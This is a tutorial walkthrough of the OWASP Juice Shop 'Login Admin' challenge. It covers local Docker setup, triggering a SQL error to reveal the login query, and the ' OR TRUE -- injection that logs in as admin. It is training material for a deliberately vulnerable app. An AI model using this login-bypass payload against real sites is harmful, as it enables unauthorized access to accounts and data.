OWASP Juice Shop — Login Admin Challenge Solution
What is OWASP Juice Shop?
OWASP Juice Shop is a vulnerable web application for security risk awareness and training. It is an open-source project written in Node. js, Express, and Angular.
OWASP Juice Shop is supposed to be the opposite of a best practice or template application for web developers.
In this tutorial, I am going to demonstrate how to solve challenges in OWASP Juice Shop using basic SQL injections.
Before getting into that, let’s look at what is SQL injection?
SQL injection is a common vulnerability where an attacker injects malicious SQL code into the SQL query running on the server-side. SQL query running on the server side takes the client’s input as a parameter, an attacker can modify the query in a way that exposes, modify, or destroy the data in the database.
The Juice shop is not properly validating user inputs. so this gives the possibility of SQL injection attack.
How to setup OWASP Juice shop locally
- Get Docker instance for Juice Shop
~$ docker pull bkimminich/juice-shop:v8.7.3
2. Start the Juice shop docker instance
~$ docker run --rm -p 3000:3000 bkimminich/juice-shop:v8.7.3
Now you can access Juice shop using
Now let us use an SQL injection attack to solve the Login Admin challenge in the OWASP Juice Shop.
Login Admin Challenge
OWASP juice shop login fields are vulnerable to SQL injection, which enables access to unauthorized access to the system.
Let us inject SQL into the login field to bypass the login and login as the first user in the database.
First, create an error by giving
'as input to the email field and any string (here I used 111 for password) to the password field.
Check the Response in the browser Network tab. You can see the SQL query used in the login.
"SELECT * FROM Users WHERE email = ''' AND password = '698d51a19d8a121ce581499d7b701668' AND deletedAt IS NULL"
Here we used
'in the email input field to cause an SQL error.
Now we know the SQL query related to logging in. We can send
' OR TRUE -- as email input and any string as a password.
"SELECT * FROM Users WHERE email = '' OR TRUE -- AND password = '698d51a19d8a121ce581499d7b701668' AND deletedAt IS NULL"
'character close the email string.
- OR is a SQL query
- TRUE is a boolean value
--will comment out the SQL query after the TRUE
So, now the SQL will check for
email = '' or true which is always a TRUE statement.
What user did you login to?
This SQL injection will log us as the first user in the database.
You can easily find the logged-in user details when you check the browser Network tab.
Now we are logged in as Admin!!!